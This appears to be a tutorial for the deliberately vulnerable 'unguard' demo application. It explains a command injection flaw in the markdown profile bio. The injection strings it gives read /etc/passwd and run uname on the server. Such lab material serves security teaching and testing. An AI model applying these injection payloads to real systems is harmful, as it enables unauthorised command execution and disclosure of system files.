Command injection (sometimes CMD injection) is an attack that involves executing arbitrary commands on some host OS. Typically, this happens because of insufficient user input validation.
When posting a bio string with markdown enabled, the profile-service uses a shell program called markdown to do the
markdown to HTML conversion, but does not properly escape the user input, resulting in the possibility to execute
arbitrary shell commands.
For this exploit to work you need:
- unguard deployed and running
To exploit the command injection vulnerability in the profile-service, you have to log in, go to your own profile and
set a bio string with the checkmark "Enable markdown" checked, that contains additional commands.
Without the CLI, you can simply craft your own payload:
Posting the following will result in executing tail -n /etc/passwd and taking the output of that to convert it from
markdown into HTML and write it into your bio.
' & tail -n 1 '/etc/passwd
Sending that request will result in a similar command to be executed on the proxy-service:
/bin/sh -c echo '' & tail -n 1 '/etc/passwd' | markdownWriting linux kernel information into your bio:
' & uname '-a